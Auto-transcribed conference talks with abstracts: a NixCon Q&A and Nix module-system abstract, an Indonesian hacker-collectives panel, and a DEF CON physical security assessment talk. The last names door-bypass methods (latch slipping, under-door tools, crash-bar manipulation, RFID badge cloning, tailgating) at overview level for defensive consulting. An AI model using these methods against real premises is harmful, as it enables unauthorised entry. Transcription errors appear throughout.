with an argument. But I mean, that's not very user friendly. I mean, you have to, again, we want to get avoid magic in incantations. So just saying Nix build or Nix doc is a lot easier than figuring out the correct Nix builds attribute name and so on. I hope that answers the question. Yep, I think that does. Let me see if there's any more questions. I actually do not think there's any more questions and I believe that ends the Q&A portion. So yeah, we are on time for that. So I guess this concludes your talk today. So thank you so much. I also, I would like to mention something just briefly before we sign off. I really do like your avatar on GitHub as Dexter. Is that some sort of inside sort of thing? Like, because I do notice that Dexter is sort of like a precocious little genius that has like a laboratory in his room and he's always working on experiments. And I've noticed for the past Nix con that you've also just like talked about your experiments. So you're both sort of like scientists in your own right. Yeah, I mean, it's not really any deep thought that went into that. But I was a Dexter fan in the 90s. And we both wear glasses. So I guess that's close enough. Okay, I guess that signs off for today. Thank you so much. Everyone in the chat, please put clapping emojis or you know, loud clapping sounds and you know, we're live and direct. Can you also like out now, we talk about binaries, put ones in the chat like go crazy. Come on. I want to see the chat go crazy.
Nix's configuration language is quite powerful, but suffers from a lack of discoverability, usability and consistency. In this talk, I'll describe an experimental Nix module system that provides a consistent, discoverable mechanism to write configurations such as packages and NixOS systems, and show how this enables a better user experience for both new and advanced users. Nix's configuration language is quite powerful, but suffers from a lack of discoverability, usability and consistency. To name just a few examples: There is no easy way to find out from the command line or from the REPL what arguments are supported by functions like stdenv.mkDerivation or buildPythonPackage. Mechanisms like the .override attribute provide an almost unlimited ability to customize packages, but the only way to figure out what you can override is to read the source of the Nix package, and writing overrides is often black magic. NixOS has a nice self-documenting module system, but Nix packages are written in a completely different functional style. The Nix CLI doesn't know anything about package functions, .override and .overrideDerivation, the NixOS module system, the Nixpkgs config attribute set, Nixpkgs overlays, or any other customization mechanisms that have emerged over the years. The syntax and semantics of Nix expressions are often an obstacle to new users and have a steep learning curve. In this talk, I'll show an experimental Nix module system, similar to the NixOS module system, to replace the "functional" package style using in Nixpkgs. This means that functions like mkDerivation or buildPythonPackage as well as packages become modules that can build on each other. For instance, the "GNU Hello" package is a module that inherits from the unixPackage module, which in turn inherits from other modules like derivation. Package customization is done in the same way: by inheriting a module. These modules, just like in NixOS, have types and documentation. As a result, everything becomes discoverable and modifiable from the command line. For instance, there is a command nix list options that shows everything that can be customized in a package. It also provides a standard for documentation: the command nix doc generates HTML documentation for the modules in a flake.
10.5446/50669 (DOI)
So, welcome to the Darten-Sporntag. Now I have three very interesting people in Jitzi. They are coming from far away of this world. They come from, as I see, Indonesia. I want to tell about utopias, also about crash food utopias of Indonesia. And I will hand over to you guys. And I am very interested. Thank you. It's yours. Thank you very much. Can you hear me? Can you confirm that you can hear me? Yeah. OK, a perfect. Very good. Thank you very much for this. So, exactly. Hello and welcome everyone to this session on democratizing and decolonizing the future. Also, crash food utopias from Indonesia. And so our idea for today was to show you four projects that represent completely different approaches on hacking and making in Indonesia. And we chose these because the topic of the conference is basically to dare more utopia. And in my opinion, that is exactly what the collectives that you will hear from today are doing already. They try to solve social problems. They critique current practices and status quo. And they also raise awareness around societal problems and social problems. And they democratize and decolonize technology. And they basically do this in order to make the future more equitable. That means that by doing the work that they are doing today, they try to create positive futures for their communities and also around the world. So I personally, my name is Regina and I work at the Technical University of Berlin. I did my field research in Indonesia from my dissertation a few months ago. And that's where I met our speakers who are going to be presenting today. So today, first up, it's going to be Adin from the Hysteria Collective from Samaran. So I'm the first one. Huh? Yes, because you're the first in the alphabet. The second will be Ira from Georgia Carter, who is the founder and director of HONF, our House of Natural Fiber. And then we will hear from Gustav, who is the founder of Common Room in Bandung. And last but not least, we will hear from Benny from the Ognomedia Collective in Surabaya. So they are actually joining us from different parts of Java. And of course, instead of talking for them, I will now ask them to present their projects. And the idea is to help us understand what they do by showing and explaining some of the projects that they do. But the special focus on the technologies they use. And also tell us about what social problem they try to solve and explain to us the context of these projects, meaning why these projects are necessary in order to create happier and more equitable futures. So for the next 25 minutes, we will learn about the four projects. And then we would like to open up the session for a Q&A in which you should feel free to ask questions in German as well. We will be translating these for the panel. So first up, let's hear from Adin, who runs the Collective with, in my opinion, the funniest logo in all of Indonesia. And Adin, you will need me to run the presentation or will you do that? Can you share my presentation? Yes. And just a sec, I will share my screen, which I'm doing right now so we can see your face. And here is your presentation. Okay, because the time is very short, I will start now. So this is our collective. Basically, we are an artistic collective from Semarang. Semarang is located in the Central Java island. Next, we call ourselves Collocoratorium and Creative Impact Hub. Because we do many collaborative experiments and do something with platform and sometimes with art project. And before we know that our capacity being a hub, we cannot identify what we are until we realize that these practices are more likely hub. So that's why we are branding our staff with next. And this is our spaces, we rent a house since 2008. And we use this house to do many things like a workshop and exhibition and also do performances. Next. And this is another place in my automatic space. There is backyard and we can use it for doing gigs and music concerts. And also we have small library and content with many things from across the city in Indonesia. Next. So the previous is, we do this situation like of participation in the public in terms of urban planning, urbanization and also contestation of planned ownership. And the same government for all the capacity is that involving people to engage in the quality that is necessary. And for vulnerability of social solidarity and the lack of sense of belongingness. So in terms of participation of public in Indonesia, the government guarantee us to participate in urban planning. But in fact, there is many obstacles to do that. So in terms of artist collective and also the policy in the issue, we want to do something that is possible as we can. As long as we fit with our capacity. And next. So what we are doing now. So first one we do plus making project building engagement. And we use the vernacularism as collective memory. I mean, we do ethnographic research in the site specific. And then we do mapping, social mapping, after mapping and also folklore and something that connected with the collective memory that supporting people becoming one community. It is related with the previous issue that people didn't attach with the place because they feel the place is not special anymore. So because of that sometimes they just abandon the concern that they are going to place itself. So that's why press mapping project is very important for us and to attach people with the place. We using stories and best people and also social media and some application that's already available in a app store or something like that. So this leading us to the third thing is the building we have using available and this is the capacity. For the for the example. So this is our activity. For the example, we are using the top platform before it's becoming viral. In the in the two years ago, when the government want to ban TikTok because it's useless. But we are using it for the to tell the story. It's happened a long time ago before TikTok becoming viral. And we just practice that you want to reach another audience that's very different with YouTube, Instagram and anything. So this is basically what we do with you mapping and also interview into community next and bring next and bring this before that before that. And bring this data into online mapping. We are using open street map. You're using open street map and also society platform to do reporting something that happened in that site. Next. And also we create mural with the related with the story that happened in the place. Next. And also we do scanning for the 3D. Because we want to create augmented reality. Or with using our asthma. Our asthma is a application and now becoming HP review. So the basic idea is we are using available application and then using it for our benefit. That's how we use technology in our term. And also next. So this is the the actual map. But we can go to the specific to the site itself to see how to see the trickery image can leading us to many stories that we can drink before. Next. Yeah, this is one of our festival in in Kampung. It's the small unit of social community in Indonesia. Next. And the last one we have place and space making machine. We have two, three motorcycle, three cycle. What do you call it? Like a three wheel. Motorcycle with a three wheel. So we use this. The what you call it. The backers. To create a stage so people can perform and also. My my exhibition in that place. So sometimes we're using this to go to small alley to intervene. The site and then creating art event or art project. Next. Yeah, that's the real thing before the event. Next. So now we have many public network. Not only in Samarang, but also in another city and we have protected each other by using what's up group. And also we update all this information through the was up. Next. Is. Okay, I think it's done, but can I share the video about how to manage. If it possible. Thank you. Yes, sorry. Yes, absolutely. I think that I just need to go back to the video thing and then and then you can take the screen sharing up. Okay. Yeah, yeah. Life is half as part of the line of death We're about to let you sign inside, we believe For real, man, I'm a real man Just try to pass through the water now Keep on your feet and the ground, I'll give you my name For times you can't free off the law A tower of earth and dissent as you grab your tickets Sealing here, reprise your head and we'll be coming For real, man, I'm a real man Just try to pass through the water now Keep on your feet and the ground, I'll give you my name For times you can't free off the law A tower of earth and dissent as you grab your tickets Sealing here, reprise your head and we'll be coming For times you can't free off the law A tower of earth and dissent as you grab your tickets Thank you for all the time Unless there's any immediate urgent questions, we would then move on to Ira's presentation Okay Ira, are you ready? Yes Hello, so I just started, okay? Can you hear me? So my name is Irana Grivina, so people call me Ira So I come from Jakarta, Indonesia, three hours from where I did base, Hysteria base And so I'm the co-founder of HON Foundation, a foundation focusing in art science and technology And I'm also the founder of XXL, a female collective that also focusing in art science and technology I will not speak too much because I have a video that presents almost everything that I wanted to talk and share So I will share the video, it's about like five minutes long And I hope it's clear and entertaining So I will just start to share it, yeah, I hope you will enjoy it Oh, sorry Sorry, sorry The way is to leave My name is Irana Grivina, media name is Rukh So can you hear the sound now? Don't be do something like art combining with technology so it become a community And then we move from our home into a light little garage, belong to my grandma Here hiking means you have to live because sometimes the price is too high and then we hike it So we build the prosthesis from local material like bamboo, kind of like pineapple fiber and wood That idea come across to our man because it's hard to get prosthesis in here And sometimes you have to wait for a long queue to get just one prosthesis Before I came to Australia, actually there are a lot like Australian artists came here and we collaborate in some projects So I was invited at the Melbourne University to do a presentation about art science and technology and then I did the workshop And I hope in the future we still have more network and connection so we can do more sharing There are also a lot of people as well, you want to keep your research open, why you want to give your knowledge Why you stick on the openness and why you fight for open culture, open science, open design or open source technology But I think to open means you give more rather than you take The project is actually about how do you know about the quality of the water, how far do you know about the water that you drink every day Or do you use for what's every day That's the our water purified Every household in here can make it by themselves and then they have clean and safe water to drink every day without have to buy It will be more easier for us as a women to talk to other women And the women is play an important role in here because they are the one who do the domestic jobs Especially if they are host works so they are the one who control the quality of the health of the families The women are the one who do the domestic jobs The women are the one who do the domestic jobs So actually the women's position in the science and technology industry is still a bit sad or difficult to do in Indonesia Women actually have more ability because we are patient enough, we are patient enough and we have a strong desire to understand about something or to do something or to share things that we have done to other people with a very easy way Idukya is actually kind of like a big kampung or big village We still like gossiping, we still like to know what each other doing, we still like to help each other and like living in a big community We still like to really thinking about industry or capitalism In the city you still have this feeling that you belong to the society We call it actually domestic hacking and then female or citizen actually responds to what we call hacking Do I still have time? I think I will do more Q&A later so people can ask me what it does mean like domestic hacking and hacking I think we can move to Gustaf or Benny or I can bet Regina who will take over again The next person is going to be Benny who shared his presentation with me so I just want to check that we can actually hear you Benny and then I will continue with your presentation Can you just say a few words? Seems to be muted, we can't hear anything, it seems to be muted Can you check your microphone connection? In that case maybe I will move on to Gustaf and then we can do some troubleshooting in the background with Benny Hi my name is Gustaf, I based in Bandung, in the past couple of years we worked closely with Ciptaglar indigenous community in West Java Tonight I will try to share one of our project on community networks initiative in Ciptaglar indigenous community I hope you can see clearly from there, so in October we plan to organize rural ICT camp, it's part of our project that focusing on local infrastructure community in Ciptaglar village So basically why we are interested to work with the indigenous community in Indonesia in particular is because most of indigenous community in Indonesia is living in forest area Which is very important for maintaining biodiversity and also have to look at that somehow for climate change condition And in Indonesia I think in many part of the world since the COVID-19 pandemic internet connectivity has become essential tool for many important work And in Indonesia we have so many significant growth in internet penetration but digital divide are still our issues and mostly the problem is because there are an absence of internet infrastructure There are a large difference in bandwidth cost in different islands, unavailability of proper devices and also lack of local content, digital skills and also gender gap And currently we have at least 12,000 villages that has no internet access and in West Java alone I think around 42,000 students doesn't have any internet access to continue with their study We also facing global challenge like many people in different part of the world, there are huge population growth in Indonesia also increasing gap of development between urban and rural areas We also facing the impact of climate change as well as increasing number of people who got affected by the coronavirus pandemic and raw ICT is our effort to support the consolidations of ideas, practice and initiative from common citizen in developing Community based internet infrastructure, this initiative is actually part of digital access program and as well as community led approach to address digital divide in Indonesia that are supported by association for progressive communications So our main objective for this project is to overcome digital divide issues through the development of a community based internet infrastructure and apart from addressing digital divides we also try to support the sustainable development agenda, indigenous land rights recognitions As well as mitigation and the addition to climate change including the COVID-19 pandemic response and preventive prevention and youth and women empowerment in our region So there are several again that we are trying to address in this ICT camp, the first is to elaborate the internet ecosystem policy and regulation for rural and remote connectivity in Asia as well as technology and business model including the media literacy and civic empowerment for remote places So yeah, we are also during the ICT camp we planning to do an inception of training center and media lab that we are trying to develop now and we're going to release a book, a practical guideline for local community based internet infrastructure development as well as webinars workshop and sharing session and exhibitions and so far we have, we already did several preparations like for example regular visit to the village to talk to the chief leader as well as local community that are engaged with this initiative We just organize a workshop together with ICT watch, Indonesia ICT volunteer and Indonesia ISP associations in order to navigate the rural ICT camp We also doing a global meeting with our fellow from APC to coordinate and to share some of the recent development from our side and yeah I think that is some of the information that I would like to share with you and maybe we can discuss further during the Q&A, thank you Very very cool, thank you very much for that and then we will move on to Benny if we can hear him Hello, can you hear me? Yes, yes, I can hear you I probably am using it to complete some of the audio collected Alright, the only problem is that I can hear some weird feedback sounds, yeah You have to unmute your speakers, unmute your speakers and just talk Thank you Okay that sounds better so I am going to start your presentation, yeah? Can you show the picture of my, yeah Okay Can you see it? Yes, this is my artwork since I am using technology and electronics to make an exhibition next This is, I am using surveillance camera and using like a microscope, the IY and I am not only by myself to build this artworks, continue, next For the X movies, next This, I am using microscope and next I am using speakers and many videos, next Next This is Gintang Market, the market is located in the center of city of Surabaya and the market is very unique because the market is on the first floor Selling of vegetables and goods and for the everyday consumption, but the second floor is fully of the electronics and fully of the sound of prayer from the mosque is very loud Can you hear me? Go ahead Okay, go ahead Okay Thank you The sound for I am playing the sound for, the voice is very loud, this is the even input Okay, I am continue, this market is very unique because market is located in the center city of Surabaya and some of the electronics is imported from the other countries for the example of the Chinese and the size is so very big Next This is my technician and the technician is very special in the sound and some of the knowledge of the people is learned by myself They are learning by doing Next This is the situation of the sound and the sound of the technician using some of the technology Next This is one of the example of the market is closing down, many store is closed and many store is shut down during pandemic and there is, I just try to come and making a project Next Next I using parts of the electronics to make like the science fiction properties like the plumechatronics or something else and I just using plastic or electronic component to make it any wearable technology Next We call it project is still continued until the end of this year and I need to collaborate with some technician and seller to make it any possibilities with the sales of the electronics Next This is the new prototype I using many of parts of the past and then the market are using electronic and using some of the electronics equipment Next And they still relax Next This is the situation of the past and now They still happy and they still positive They still have like a power to survive during the pandemic and because the pandemic is makes still Everything is going but they still relax and support and power and have like a spirit Thank you Thank you very much Next Maybe we can After that maybe we can discuss I am my question I am sorry Yes Thank you very much for this I have never seen a word Indonesian in my life But I am really happy that the people still get to relax and not worry about the future I think the pictures didn't really quite show how vast the market is and how full it is of all sorts of electronics and bits and pieces And people just soldering away and making the most fantastic music systems and all of that So I am happy that they are doing well Right, so that was it for the presentations We have heard a bunch of different societal issues, questions and also attempts to solve these And if we have any questions from the audience I would like to jump over to that now because we are supposed to be running out of time in two minutes Well actually we can give you five minutes more We don't have something in the internet, I have two questions and I have three people in the audience I don't know whether we have questions there It doesn't look like that So my question is where can we find you guys in the internet I think it's important to have some way to connect So who likes to answer this? Adin, first would you like to start? How can we find you? Hello? Yeah So do you have a website, do you have an email address, something you want to share to get in contact with people, hackers from around the world, hackers from Germany? Yes, it's written in my presentation actually in the last page Okay, we try to put that in our video information Okay, next You're muted, Eero You have to push the spacebar Yeah, so I wrote the address in the chat so you can go to our website, home.org And then you can find everything about projects and our last project and then also some contacts there And of course I have personal email if you want to contact me but yeah, just go to home.org Okay, thank you For Common Room you can just visit our website, commonroom.info or maybe also Twitter and Instagram at commonroom underscore id And you can find many information also our contact details in that website and Instagram and Twitter. Thank you Okay, so my last question is if someone likes to support you guys, will they find information on your website or how can guys from Germany support you with money or maybe with hack advice or with whatever? Do you have a funding source? You want to mention? In my term we have no like a long support foundation, so I mean funding, so we sometimes have a project and do what you call it like a cross-sum site And then we get another job and then to create another project and sometimes the Ministry of Culture and Education in Indonesia give us some money but it's not enough to make us sustain So basically we do this because we have a vision and we know that there is a possibility that we can monetize this but not now Okay, I think that was our questions from the audience and from the internet and when you don't have to tell anything, I think that will conclude the event Okay, well thank you very very much for allowing to share these stories. It was really a pleasure and I hope that we could show the audience something new, something different And yeah, you can find the projects online and they will be more than happy to reply to any questions that you might have in the future and if you go to Indonesia then please make sure that you look for them and that you reach out to them And I think that they are always extremely generously showing everything that they have so you can also learn a lot from them on site once this pandemic is over Okay, thank you Thank you everyone Bye bye
In this online podium discussion we will present the power of critical ideas and show examples of utopian futures in the making in Indonesia. The projects created by Indonesian hackers and makers use technology to solve one or more local problems, attempting to create more equitable and positive future for their communities. They will be streamed as they happen live: different projects from around Indonesia will show how they make social change happen. Indonesia has a striving hacker and maker, activist and innovator ecosystem, and many of them have been active for more than 20 years, since the first free elections were held in 1999. They have been asking difficult questions about society and finding answers that they choose to represent in different ways: music festivals, educational workshops on climate change or privacy, community projects that involve artists and locals, or building ICT-infrastructure to allow people in rural areas to access the Internet and thereby, information. In this session, we will try to bring some of them together to show the projects they’re working on today to turn the dystopia into a utopia. Two projects are confirmed, including - Benny, a media artist & independent media researcher, started in 1999 and involved in various national and also international media events.He focuses on human-machine and machine-machine interaction. Recently he formed a collaborative project with interdisciplinary colleagues as "Oknum Media Kolektif" and some of the works are: Bitversus, Double Layer Panopticon, Mencari Wiji (searching for Wiji), Rekombinan & Insitu. He will share some experiences of those works. - Irene Agrivina is an open systems advocate, technologist, artist and educator. She is one of the founding members and current directors of HONF, the Yogyakarta based new media and technology laboratory. Created in 1998 as a place of open expression, art and cultural technologies in the wake of the Indonesian "revolution", HONF aka the 'House of Natural Fiber' was born out of the social and political turmoil against the Suharto regime, its nepotism and governmental corruption. Agrivina will share her experiences working with affordable and open technologies for grassroots movement in Indonesia. - Common Room has been involved in developing an urban/rural collaboration platform together with Kasepuhan Ciptagelar indigenous community in West Java since 2013. For this session, Common Room will share some experience in developing local community-based internet infrastructure in Ciptagelar region. - Instead of creating new applications, Hysteria Collective uses existing tech for community advocacy work: for example, to tell the history of a village. We use anthropological methods to build relationships with communities in order to explore community solidarity and we look for the collective memories through daily life stories and folklore. To tell these stories and emphasize the outcomes, we use technology as a tool, way or method to achieve the goal of sharing the stories, for example, through open street map, aurasma or HP reveal and social media. What ties these projects together is their capability to critically assess the current societal, political, technological situation and address it in meaningful ways to show that the future can be safer, sounder and more equal for all of us. The solutions they come up with are just as diverse as the problems they address, so let’s hear more about it from them.
10.5446/50739 (DOI)
Hello, Defcon Lockpick Village. Super excited to be here. This is my talk, doors, cameras, and man traps, oh my, an overview about the ins and outs of physical security risk assessment. If you are curious about pursuing this as a career option, you are in the right place. If you want to learn about lockpicking, I'll mention some sources that can help with that later on in the talk. Here is a quick intro. I am the magician or Dylan, whichever you prefer. I'm a member of the open organization of lock pickers in Orlando. I am a security consultant with Gold Sky Security. I teach cybersecurity at the University of Central Florida, Go Knights, and I am an overall security enthusiast. This is really a hobby for me as much as a career. What I do is straightforward. I explore client sites with the defenders in tow so I can demonstrate for them any physical security vulnerabilities I spot. Bringing the client defenders with me allows for a teachback while on site instead of solely in our report. It is an absolute blast. This mostly summarizes the process. I show them the vulnerability and I tell them the mitigation. So what are we going to discuss in this talk? This is not a lockpicking or how to talk. This is more a talk about the processes and procedures, mostly about what we look for and how we relay the information to the clients. I will cover physical security controls, key questions I ask my clients, and how I go about educating the clients about risk mitigation. At the end, I'll talk about how to approach this field. Physical security controls start with the front door, I think. So I want to start with doors and windows. There are a lot of mechanical components to doors, but here's a short list I tackle. Do perimeter doors have the hinges exposed to the outside? Those hinges can be exploited. Can I slide something between the latch and the strike plate to pull the door open without a key or combination? Can I get tools over or under the doors to manipulate the door handles? If I run across double doors, can I manipulate crash bars? Those bars that go across the middle of doors that you can kind of push open with your hip so you don't need to use a knob or a handle. These are all resolvable exploits. While some windows can be opened or manipulated in similar ways, they offer different challenges. In a lot of office spaces, some clients don't have policies about shoulder surfing or looking over the shoulder of a user to obtain information. This is a physical security risk. If someone is trying to establish a good time for physical entry, maybe just what PC operating systems are being used or even information as simple as what browser type of particular company is using, looking through a window is really low effort. This clip, by the way, is very much not a risk model my clients have ever asked me to test. The next physical controls are fencing and bowlards. Both are passive and require little maintenance in most cases. Even though some folks are scratching their heads about what bowlards are, don't worry, you've seen them before. Fencing is obvious. Maybe folks have them in their homes or at a work maybe. Fencing establishes a clear perimeter and if locked, clearly sets an expectation of limited access. It would take a heck of an improviser to explain to a guard why you are walking around a parking lot or building at a locked and closed facility. It's also near impossible to scale offense in most environments without attracting attention unless in a very rural location. You have all seen bowlards before. They are the reinforced obstacles that prevent the use of a vehicle as a battering ram to create a point of entry in an otherwise defended structure. This is a very fancy hydraulically assisted version, but here we are at a target. Remember when we used to go to target in 2019 for groceries? Those were the days. In front of the store, these steel reinforced concrete spheres are not just to look cool. They actually prevent people from running their cars into the glass doors to gain access in off hours to steel random stuff. It's a pretty simple passive risk mitigation, I think. Well, bonus, I just find it fun to say bowlards. Next up are mantraps. This is a super cool concept. Mantraps are completely underutilized. Sure, it's a challenge to get people through them. You'll understand why a flow of people can be interrupted in a moment, but I think they are really awesome. Many banks have them, and after seeing the next slide I am willing to bet a few of you are going to be sitting at home saying, holy cow, I've totally seen those. This is a great scene from the movie Sneakers, my personal favorite hacker movie. The lead character Bishop walks through a glass sliding door after using the magnetic stripe reader. The door closes behind him, and another door is in his way that uses a biometric reader. Now he has to get past that. Super neat control that I would love to see in more places. Cameras are a great security control for several reasons. If you have the means, I encourage you all to grab some power over ethernet or Wi-Fi cameras and try hacking them. Cameras are in most businesses and some homes now. If you have the funding at a job site, you can even have your cameras actively monitored in a SOC or Security Operations Center. Lots of small to mid-sized businesses just record video and reference it in incident response if something goes wrong for forensic purposes. Video is easy to store, and you could find out who took company property maybe after they got terminated or who was negligent in some security policy. There are many technologies in the world of cameras, but I firmly believe that Wi-Fi cameras specifically are a poor choice. Please reach out for that soapbox rant if you like. A fun fact about a lot of security cameras is that often they aren't even powered on at job sites. Because I love surveillance cameras and have several to tinker with at home, my oldest son has developed a curiosity around them and likes to point them out when we are at theme parks here in Orlando. He can quite accurately count the number of cameras on the walk up to a structure. Would you have seen the two massive dome cameras on top of this archway at Universal Studios Florida if I had not put boxes in this photo? Heck, I can't even see them hardly with the boxes, but I assure you if you go to Google Maps, they are there. Go check it out. For electronic access, I am going to do a very light touch because it is quite a dense topic. Most of you are in an office environment and have some token that grants you access. A radio frequency ID badge that you wave in front of a reader that opens a magnetic sealed door might be your front door. A pin code that is shared among employees and janitorial staff might get you into privileged rooms. Maybe a fingerprint even unlocks the laptop at your desk. Grocery stores even have electronic sensors that know when someone is there and detect motion and open for you. All of these things can be exploited or copied in some way. I personally am one of the many cyborgs in the hacker community. I got an implant from dangerous things last year and can clone radio frequency ID badges to my hand. I use that to educate clients about the importance of cycling the guest badge so that way someone can't take that badge number and then come back with it and let themselves in. Next, I want to talk about how to speak to clients in a productive way. What is your personal area of concern? In other words, ask a client what on earth they care about. I've demoed a parking lot to serve room break in in four minutes and had a client shrug their shoulders. Their dollars were in a manufacturing area in another more secure location. Ask your client what they want you to put time into. Being efficient is a good way to get repeat clients in a role where often you're billing hourly. Don't miss any doors. There is no shame in verifying with a client that you have tested the entire perimeter. Ask which doors get the most traffic and which get the least. Some doors may have super beefy security while another, maybe a smoking area door, has people flowing in and out of it throughout the day and has less security favoring convenience. Those are good doors to test a tailgating attack where you try and walk in behind an employee. Because you truly are a guest in the scenario of being a security risk assessor, you can test guest access policies firsthand. In some cases, if it is in scope, meaning if the client has agreed to it ahead of time, try entering the client premises and asking you to use the restroom, then see how far you can get into the building unattended. If you show up and notice a robust check-in policy, maybe with a photo and temp badge, great. That is often not the case. Do you get an escort? Also a bonus. Can I keep an RFID badge and replay it when I come back next year for an assignment? Not ideal, but I've seen that before. Do you get watched like you're a suspicious hacker in a hoodie or is there instant trust once you've made it past the perimeter? Final fun thing to look for if you get a guest badge. Where can you get in the building? You might be surprised to find yourself in a CEO or CFO office if you're lucky. Here we see some extremely robust guest security policies in action. Armed guards are monitoring a guest who is also restrained and has their tools confiscated temporarily. Someone in security operations hands the guest off to a person of authority who is also armed for the purposes of communication. This is a bit much, but similar procedures are not unheard of in a military or DOD establishment. As a social engineering enthusiast myself, this is a huge topic. Entire companies are dedicated to just educating and empowering employees to act as part of the security team for a company. Here are quick points on the matter. Gamify your security training. A traveling trophy can go on the desk of the person with the least clicks on email phishing one month or maybe someone else who always locks their computer when they head to the break room. Be creative. Let employees know that they're an integral part in the security of their company and that they can be the first line of defense. Every employee is part of the security team. As a social engineering enthusiast, this is equally important. You want to make sure you're establishing rapport with your clients. You want them to want you to come back. Constructive criticism can be done in a very positive way. While there have been tons of talks about how to exploit mechanical components of physical security, there have been just a few that cover the specifics of educating the clients on how to go about resolving the exploits that you've demonstrated on the job. Constructive criticisms are the way to go. A positive focus is absolutely critical. Directed or accusatory verbiage is never productive. Saying things like this is so bad or I can't believe you set it up this way. You need to be replaced with we have some good opportunities here for improvement. Simple phrasing can mean a huge world of difference. Also, leading a client to come to their own conclusions through education and demonstration will work wonders for client morale. Here is the show and tell part. This really is my favorite part of the job. Showing the defenders vulnerabilities on site is immensely fun and can have an extremely positive impact. Telling someone you can bypass a door versus showing them how has a huge difference in the likelihood that a mitigation will be implemented. This step in the process also gets the most heads popping into the room. It gets people excited about the security of their company. I have yet to run across a group of employees that doesn't show interest in an under door tool or a latch slip. This is pretty big. This is all about soft skills and keeping people calm in an otherwise stressful environment. Fear and certainty and doubt have no place when you're trying to be productive. You want to avoid saying things like, oh, this is bad or you've done this incorrectly. Instead, be inclusive and positive. We can fix this. No big deal. Make sure that you're explaining things. You're not telling them. You don't want to just send an email with resolutions. You want to actually have a human conversation. This is pretty much the best explainer of fear and certainty and doubt and why it can damage a client relationship. Fear is not a good motivator to get risks mitigated. Educate and empower. Never be little or disrespect. Provide some means for clients to reach out to you. Don't be out of touch. A reputable company should provide you with a company email. And if you're lucky, a company phone number. This can separate work and home. And keeping a work-life balance in this particular career field can be challenging at times. Make sure to also set expectations about when you can be reached and how long it may take for you to respond. I feel education is the most important aspect of hacking insecurity. That's not to say that a four-year degree or anything like that is needed. Kudos if you're going that route. The different approaches to learning are varied. But here are a few. Podcasts, YouTube, and Udemy were big wins for me personally. If you want to get into lockpicking or just see some jaw-dropping feet of lock exploits, then look no further than lockpicking lawyer. The content on his channel is consistently enjoyable and never-stale or boring. If you are an auditory learner, then podcasts are fantastic. Darknet Diaries is amazing with great storytelling and incredible guests. The lessons learned are valuable and always come in an entertaining package. If you want to direct your attention at certification to prove you know a specific skill set, then Mike Myers on Udemy has, I personally think, the best online content for CompTIA Security Plus and Network Plus. He does cover some physical security content in the Security Plus lecture, and he does it in a very fun way. These three are Bill Nye level explainers for those of you who are old enough to remember Bill Nye from the 90s. While not everyone learns from books, I know I certainly can, specifically if the content is fascinating to me. I tried to trim this down to a short list that I can recommend for everybody. Social Engineering, the science of human hacking by Chris Hadnaggy, is a very professional and comprehensive guide to social engineering. If you want to learn more about that kind of engagement, Practical Lock Picking by Deviant gives you a more complete understanding of locks, not just how to pick them. The Art of Deception by Kevin Mitnick is super famous, and if you haven't read it, you really should. Although, I will mention that Chris Hadnaggy's book is more of a scientific and professional approach to learning about social engineering. What every body is saying is very useful if reading people. This is helpful in everyday life as well as on the job. Just like previously, I wanted to throw in something strictly for those aiming at certifications. I really am a huge fan of anything and everything under the exam cram brand. I really think they portray the information in a way that's very easy to absorb. This was a big topic for me, and I hope to emulate those who helped me and pay it forward, so to speak. Approach professionals and listen to talks. Be courteous. These people are busy and have their own lives. That consideration aside, security professionals are people and like to share their experiences. I have received an amazing amount of support from the community and wanted to list folks who are large influences for me. I encourage you to pour over previous deaf contacts and find individuals who share your personal mindset and speak to you specifically. Use the knowledge shared in venues like this to build an even stronger community of sharing. While I know I am biased as an instructor, I recommend taking guided courses if you are able. Here are some I personally plan to attend as soon as we are able. You can learn physical security, social engineering, or really anything you like in a course guided by a professional in the field. A textbook will never have all the answers. Being able to raise your hand and ask the what ifs and what about this type of questions are hugely valuable. Since we are all at DEF CON, you all have already nailed this so well played. Attending events and local meetups is a great way to meet new people and network. The people I have met in Orlando through meetups and events have truly driven my career. I was able to learn all the skills I couldn't practice because either I personally did not have the tools or the content online didn't quite break things down well enough for me. Just getting introduced to people that could help me understand things between the lines of textbooks was awesome. Huge shout out to the folks at Citrus Sack in Orlando and DC407. If you see your city on the list, then that means there is a chapter of the open organization of lock pickers in your town. I encourage you to reach out to your local tool group and meet some cool people. If you don't see your city, good news. You can now start a chapter in your town and find people that are into physical security. The open organization of lock pickers or tool has been amazing to me and I love being a member. Second to last slide, I promise, but I want to say thanks to my family and friends. Mostly my wife and kids. Thank you for understanding when I disappear into my lab for hours at a time for random projects. Thanks Orlando hackers for just being total class acts. I want to thank Tool for providing me an unbelievable networking opportunity and the ability to practice hands-on with locks and tools I would never have seen otherwise. Thanks GoldSky Security for the opportunity to learn and grow in an incredible supportive environment. DefCon, thank you for having me. This event is so special. And to the hacker community at large, keep being curious and keep pushing boundaries. I love helping people who are getting started or maybe who are stuck on something. Feel free to reach out. I might take a bit to respond, but I will do my level best to help. This was a lot of information in a short amount of time, so if you want clarification on something, I am at 31337Magician on Twitter and here is my LinkedIn if you prefer that channel. Thanks for listening to my talk. That's all I have on this topic, but feel free to reach out if you want to have anything answered that you're still curious about. Have an excellent day and enjoy DefCon.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn the hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices, techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools, and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50741 (DOI)
